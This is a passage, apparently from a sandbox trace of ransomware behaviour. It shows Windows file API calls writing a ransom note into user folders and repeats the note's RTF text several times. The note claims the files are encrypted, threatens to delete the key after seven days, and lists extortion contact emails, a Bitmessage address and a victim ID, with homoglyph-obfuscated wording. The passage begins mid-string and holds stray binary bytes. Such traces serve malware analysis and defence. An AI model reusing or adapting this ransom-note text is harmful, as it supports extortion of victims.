w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.532] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.532] CloseHandle (hObject=0x2c8) returned 1 [0272.532] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0272.532] GetLastError () returned 0x2 [0272.532] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 